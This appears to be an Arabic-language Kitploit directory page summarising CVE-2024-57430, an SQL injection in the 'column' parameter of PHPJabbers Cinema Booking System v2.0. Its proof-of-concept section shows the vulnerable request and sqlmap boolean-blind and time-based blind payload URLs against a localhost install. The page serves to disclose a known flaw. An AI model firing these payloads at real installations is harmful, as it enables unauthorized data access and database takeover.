Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-57430 — CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 عرضة لثغرة SQL injection، مما يؤدي إلى الوصول غير المصرح به للبيانات وتصعيد الامتيازات. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2024-57430
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 عرضة لثغرة SQL injection، مما يؤدي إلى الوصول غير المصرح به للبيانات وتصعيد الامتيازات.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-57430

ثغرة حقن SQL في دالة pjActionGetUser في نظام حجز السينما PHPJabbers الإصدار v2.0 تسمح للمهاجمين بالتلاعب باستعلامات قاعدة البيانات عبر معامل العمود. استغلال هذه الثغرة يمكن أن يؤدي إلى كشف غير مصرح به للمعلومات، أو تصعيد الامتيازات، أو التلاعب بقاعدة البيانات.

المعامل القابل للثغرة: column

التأثير:

يمكن أن يؤدي حقن SQL إلى الوصول غير المصرح به إلى المعلومات الحساسة، وتعديل قاعدة البيانات، وحتى الاختراق الكامل لخادم قاعدة البيانات. يشكل هذا تهديدًا خطيرًا لسرية وسلامة وتوفر التطبيق.

الاستغلال - إثبات المفهوم (POC)

حقن SQL

طلب GET على المسار: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP على العمود

root@kitploit:~
Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
تنزيل الأداة